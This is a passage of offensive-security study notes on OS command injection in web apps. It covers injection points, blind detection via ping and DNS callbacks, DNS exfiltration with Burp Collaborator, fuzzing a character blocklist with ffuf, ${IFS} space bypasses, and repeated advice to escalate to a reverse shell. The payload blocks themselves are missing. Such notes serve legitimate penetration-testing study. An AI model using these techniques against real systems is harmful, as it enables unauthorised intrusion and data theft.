Edit

Cmd Injection

Where Would You Find Command Injection

  • In the following places:

  • Text boxes that take in input

  • Hidden URLs that take input

  • E.g. /execute/command-name

  • Or through queries e.g. /location?parameter=command

  • When using URLs, remember to URL encode the characters that aren’t accepted

  • Hidden ports:

  • Some frameworks open debug ports that take in arbitrary commands

Overview

  • Use command line symbols within the input to alter the executed command

  • Pay close attention to functions within an application that tend to be performed by an OS command

  • Two forms exist, blind command injection --> you do not see the returned output, and non-blind cmd injection --> the system command output gets returned back to you

  • Ensure you use the proper system commands per the OS

cat vs type 
ping -c vs ping -n #ping -n causes an infinte ping loop in linux
ls vs dir

  • Try to start with reading a world readable file

Non-Blind CMD Inj.

  • At the most basic level:

  • Use command line symbols within the input to alter the executed command

  • Once you have identified a potential injection point, use command line symbols within the input to alter the executed command

  • Once you have exploited non-blind cmd injection, escalate to a reverse shell.

Blind CMD Injection

Identification

  • ICMP and DNS are useful to determine blind cmd injection

  • Can also try to ping yourself, however many corporate environments have firewalls in place to stop this, so doesn't always mean blind cmd injection isn't taking place

  • Use tcpdump to capture the icmp echo requests.

  • This proves blind cmd injection, escalate to reverse shell

Burp Collaborator

  • Launch Burp, and choose:

  • Press Poll Now to see if the request came through

  • If the above worked, move down to Data Exfil section

Data Exfil via DNS and Burp Collaborator

  • Once you have your Burp Collaborator Domain, try your command injection

  • Press Poll now and you should have something returned like this:

  • Then type the following in your local terminal

  • If this fails as Invalid Base32 add 1, or 2 equal signs at the end for padding

Bypassing Character Blocklist with ffuf

  • If you see that some special characters are banned, create a burp request to the resource you want to test

  • It should be a post request

  • Identify the parameter that it is using to post the data to the server

  • Swap out the command injection attempt that is getting blocked in the burp request with:

  • Save the burp request to your local machine in a file

  • You usually will have to ignore the & character as many webservers will think you are going to pass in another parameter

  • Now that you have your results back you must filter out the most common side that you see being returned

  • -fs 724

  • Can comma seperate filter size i.e. you see alot of 724 and 726 returned saying that character you posted is blocked

  • -fs 724,726

  • Ensure you also -mc all or match code to see all the different http status codes returned, look for 5XX errors

  • If you see errors on:

IFS Bypass No Spaces CmdInjection

  • whitespace bypass

  • can see above that the username (our injection point) cannot contain spaces, we can use {IFS}to bypass this restriction and get cmd injection

  • Gaining a reverse shell, encode your payload and have it decode and execute to avoid special character issues

PreviousAuthentication BypassNextJavascript Vulnerabilities

Last updated